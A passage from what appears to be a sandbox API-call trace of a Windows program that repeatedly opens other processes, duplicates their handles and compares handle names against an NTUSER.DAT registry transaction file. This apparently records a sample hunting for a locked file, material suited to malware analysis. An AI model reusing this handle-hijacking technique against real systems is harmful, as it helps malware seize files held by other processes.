dwMilliseconds=0xfa) returned 0x0 [0165.520] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.520] CloseHandle (hObject=0x1e4) returned 1 [0165.520] CloseHandle (hObject=0x194) returned 1 [0165.520] CloseHandle (hObject=0x1e8) returned 1 [0165.520] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.520] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.521] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.521] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.521] CloseHandle (hObject=0x1e4) returned 1 [0165.522] CloseHandle (hObject=0x194) returned 1 [0165.522] CloseHandle (hObject=0x1e8) returned 1 [0165.522] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.522] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.522] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.522] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.523] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.523] CloseHandle (hObject=0x1e4) returned 1 [0165.523] CloseHandle (hObject=0x194) returned 1 [0165.523] CloseHandle (hObject=0x1e8) returned 1 [0165.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.523] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.524] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.525] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.525] CloseHandle (hObject=0x1e4) returned 1 [0165.525] CloseHandle (hObject=0x194) returned 1 [0165.525] CloseHandle (hObject=0x1e8) returned 1 [0165.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0165.525] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.527] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.527] CloseHandle (hObject=0x1e4) returned 1 [0165.527] CloseHandle (hObject=0x194) returned 1 [0165.527] CloseHandle (hObject=0x1e8) returned 1 [0165.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0165.528] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.528] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.529] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.529] CloseHandle (hObject=0x1e4) returned 1 [0165.529] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.529] CloseHandle (hObject=0x194) returned 1 [0165.529] CloseHandle (hObject=0x1e8) returned 1 [0165.529] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0165.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.530] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.531] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.531] CloseHandle (hObject=0x1e4) returned 1 [0165.531] CloseHandle (hObject=0x194) returned 1 [0165.531] CloseHandle (hObject=0x1e8) returned 1 [0165.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0165.531] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.532] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.533] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.533] CloseHandle (hObject=0x1e4) returned 1 [0165.533] _wcsicmp (_Str1="\\ntdll.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -17 [0165.533] CloseHandle (hObject=0x194) returned 1 [0165.533] CloseHandle (hObject=0x1e8) returned 1 [0165.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.533] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.534] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.535] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.535] CloseHandle (hObject=0x1e4) returned 1 [0165.535] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.535] CloseHandle (hObject=0x194) returned 1 [0165.535] CloseHandle (hObject=0x1e8) returned 1 [0165.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.535] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.536] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.537] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.537] CloseHandle (hObject=0x1e4) returned 1 [0165.537] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.537] CloseHandle (hObject=0x194) returned 1 [0165.537] CloseHandle (hObject=0x1e8) returned 1 [0165.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.537] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.538] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.539] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.539] CloseHandle (hObject=0x1e4) returned 1 [0165.539] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.539] CloseHandle (hObject=0x194) returned 1 [0165.539] CloseHandle (hObject=0x1e8) returned 1 [0165.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.539] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.540] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.541] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.541] CloseHandle (hObject=0x1e4) returned 1 [0165.541] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.541] CloseHandle (hObject=0x194) returned 1 [0165.541] CloseHandle (hObject=0x1e8) returned 1 [0165.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.541] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.542] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.543] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.543] CloseHandle (hObject=0x1e4) returned 1 [0165.543] CloseHandle (hObject=0x194) returned 1 [0165.543] CloseHandle (hObject=0x1e8) returned 1 [0165.543] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.543] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.544] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.546] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.546] CloseHandle (hObject=0x1e4) returned 1 [0165.546] CloseHandle (hObject=0x194) returned 1 [0165.546] CloseHandle (hObject=0x1e8) returned 1 [0165.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.546] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.547] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.547] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.548] CloseHandle (hObject=0x1e4) returned 1 [0165.548] CloseHandle (hObject=0x194) returned 1 [0165.548] CloseHandle (hObject=0x1e8) returned 1 [0165.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.548] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.548] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.549] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.549] CloseHandle (hObject=0x1e4) returned 1 [0165.549] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.549] CloseHandle (hObject=0x194) returned 1 [0165.549] CloseHandle (hObject=0x1e8) returned 1 [0165.549] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.549] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.550] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.551] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.551] CloseHandle (hObject=0x1e4) returned 1 [0165.551] CloseHandle (hObject=0x194) returned 1 [0165.551] CloseHandle (hObject=0x1e8) returned 1 [0165.551] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0165.551] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.552] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.553] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.553] CloseHandle (hObject=0x1e4) returned 1 [0165.553] CloseHandle (hObject=0x194) returned 1 [0165.553] CloseHandle (hObject=0x1e8) returned 1 [0165.553] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.553] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.554] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.556] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.556] CloseHandle (hObject=0x1e4) returned 1 [0165.556] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.556] CloseHandle (hObject=0x194) returned 1 [0165.557] CloseHandle (hObject=0x1e8) returned 1 [0165.557] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.557] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.557] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.558] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.558] CloseHandle (hObject=0x1e4) returned 1 [0165.558] CloseHandle (hObject=0x194) returned 1 [0165.558] CloseHandle (hObject=0x1e8) returned 1 [0165.559] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.559] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.560] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.560] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.561] CloseHandle (hObject=0x1e4) returned 1 [0165.561] CloseHandle (hObject=0x194) returned 1 [0165.561] CloseHandle (hObject=0x1e8) returned 1 [0165.561] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.561] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.561] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.562] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.562] CloseHandle (hObject=0x1e4) returned 1 [0165.562] CloseHandle (hObject=0x194) returned 1 [0165.562] CloseHandle (hObject=0x1e8) returned 1 [0165.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.562] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.563] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.564] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.564] CloseHandle (hObject=0x1e4) returned 1 [0165.564] CloseHandle (hObject=0x194) returned 1 [0165.564] CloseHandle (hObject=0x1e8) returned 1 [0165.564] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0165.564] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.565] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.566] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.566] CloseHandle (hObject=0x1e4) returned 1 [0165.566] CloseHandle (hObject=0x194) returned 1 [0165.566] CloseHandle (hObject=0x1e8) returned 1 [0165.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0165.566] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.566] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.567] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.567] CloseHandle (hObject=0x1e4) returned 1 [0165.567] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.567] CloseHandle (hObject=0x194) returned 1 [0165.568] CloseHandle (hObject=0x1e8) returned 1 [0165.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1e8 [0165.568] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.568] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.569] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.569] CloseHandle (hObject=0x1e4) returned 1 [0165.569] CloseHandle (hObject=0x194) returned 1 [0165.569] CloseHandle (hObject=0x1e8) returned 1 [0165.569] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.569] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.570] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.571] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.571] CloseHandle (hObject=0x1e4) returned 1 [0165.571] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.571] CloseHandle (hObject=0x194) returned 1 [0165.571] CloseHandle (hObject=0x1e8) returned 1 [0165.571] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0165.571] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.572] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.573] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.573] CloseHandle (hObject=0x1e4) returned 1 [0165.573] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.573] CloseHandle (hObject=0x194) returned 1 [0165.573] CloseHandle (hObject=0x1e8) returned 1 